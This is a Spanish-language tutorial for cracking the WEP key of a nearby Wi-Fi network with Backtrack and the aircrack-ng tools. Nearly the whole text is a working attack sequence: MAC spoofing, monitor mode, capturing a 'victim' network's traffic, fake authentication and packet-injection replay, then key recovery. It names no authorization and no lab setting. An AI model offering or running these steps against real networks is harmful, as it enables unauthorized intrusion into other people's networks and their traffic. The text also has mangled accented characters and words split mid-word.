Para crackear WEp con cifrado "OPN", para casos con "SKA" es ligeramente distint o y ms complejo. Al iniciar Backtrack startx Abrir consola (cuadrito negro en barra de herramientas) sudo ifconfig El nombre de la interfaz NO es "eth0" y puede ser "wifi0", "wlan0", "ath0" o "ph y0" de ahora en adelante cuando diga "(interfaz)" me refiero al nombre de la tar jeta ** (en caso que falle la autentificacin usar este comando) sudo ifconfig (interfa z) down ** (en caso que falle la autentificacin usar este comando o para recordar la mac ms fcilmente) sudo macchanger --mac 00:11:22:33:44:55 (interfaz) Ahora iniciamos la tarjeta en modo monitor con el siguiente comando: sudo airmon-ng start (interfaz) En este punto la tarjeta de red cambiar de nombre a algo similar a "mon0" (monito r 0, si uvieras mas de 1 tarjeta podrias tener monitor 0 y monitor 1, etc...) Ahora vamos a revisar las redes que hay con el siguiente comando: sudo airodump-ng mon0 Cuando ya ubiques a una potencial victima (que tenga clave WEP, un nombre en SSI D y su PWR est entre -0 y -70) presionas ctrl + c para detener el escaneo. Ahora vamos a olfatear a la red victima con el siguiente comando especifico de a irodump: sudo airodump-ng -c (ac nmero del canal) -w (nombre del archivo que contendr los da tos) --ivs --bssid (MAC de la victima) mon0 Ahora vamos a enviar datos para que la red entregue mas informacion para revisar (si tienes suerte en este punto en la ventana del airodump los numero bajo "DATA " deberian estar aumentando por si solos) PASO 1: ASOCIARSE Abrir consola (cuadrito negro en barra de herramientas) sudo aireplay-ng -1 0 -a (MAC victima) -h (MAC tuya) mon0 NOTA: La parte de "-h (MAC tuya)" puede ser omitida, quedando el comando como se muestra a continuacin: sudo aireplay-ng -1 0 -a (mac victima) mon0 Debe decir: Sending authentication Request (open system) Authentication sucessful Sending Association Request(ACK) Associacion successful :-) (AID:1) Si arroja error por channel incorrecto volver a intentar hasta que se cuelgue de l channel correcto (SI NO PUEDES ASOCIARTE USA LOS PASOS ADICIONALES MARCADOS CON ** y omite el pas o de asociacion)

PASO 2: ENVIAR PAQUETES Abrir consola (cuadrito negro en barra de herramientas) sudo aireplay-ng -3 -b (MAC victima) -h (MAC tuya) mon0 NOTA: se puede omitir la parte de "-h (MAC tuya)" ** (en caso que falle la autentificacin) sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (MAC victima) -h (MAC tuya) mon0 NOTA: Se puede omitir la parte de "-h (MAC tuya)" Te preguntara si quieres usar el paquete de datos, contesta con "n" y "enter" ha sta que el paquete de datos sea de 400 - 500, entonces contesta con "y" Abrir consola (cuadrito negro en barra de herramientas) sudo aircrack-ng nombredelarchivoenelqueguardaslosdatos-01.ivs